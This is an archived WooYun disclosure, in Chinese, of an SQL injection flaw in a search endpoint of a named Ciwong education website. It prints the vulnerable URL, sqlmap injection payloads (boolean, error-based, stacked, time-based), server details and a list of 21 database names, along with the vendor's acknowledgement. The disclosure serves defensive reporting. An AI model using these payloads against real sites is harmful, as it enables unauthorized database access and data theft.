乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-20: 细节已通知厂商并且等待厂商处理中 2015-01-21: 厂商已经确认,细节仅向厂商公开 2015-01-31: 细节向核心白帽子及相关领域专家公开 2015-02-10: 细节向普通白帽子公开 2015-02-20: 细节向实习白帽子公开 2015-03-06: 细节向公众公开
习网某站SQL注入漏洞
http://haohaizi.ciwong.com/search/GetVideo?_=0.7888064351864159&cate=2&order=2&page=1&txt=etxt字段可注入
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: txt (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: _=0.7888064351864159&cate=2&order=2&page=1&txt=e%' AND 5773=5773 AND '%'=' Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: _=0.7888064351864159&cate=2&order=2&page=1&txt=e%' AND (SELECT 6611 FROM(SELECT COUNT(*),CONCAT(0x7178767171,(SELECT (CASE WHEN (6611=6611) THEN 1 ELSE 0 END)),0x716b6a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'=' Type: stacked queries Title: MySQL > 5.0.11 stacked queries Payload: _=0.7888064351864159&cate=2&order=2&page=1&txt=e%'; SELECT SLEEP(5)-- Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: _=0.7888064351864159&cate=2&order=2&page=1&txt=e%' AND SLEEP(5) AND '%'='---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5back-end DBMS: MySQL 5.0available databases [21]:[*] cdn_ciwong[*] ciwong_qr[*] cw_activity[*] cw_education_db[*] cw_publicplatform[*] cw_publicplatform_v2[*] cw_res_bookroom[*] cw_school_learning_platform[*] cw_schoolbased[*] cw_sunshine_show[*] information_schema[*] mysql[*] newappsystem[*] newappsystem20150107[*] performance_schema[*] roomwork[*] t_sunshine_boss[*] test[*] weibodatabase[*] xixin_location[*] xxim_db
见详细说明
过滤
危害等级:高
漏洞Rank:10
确认时间:2015-01-21 19:20
多谢,我公司会尽快修复!
暂无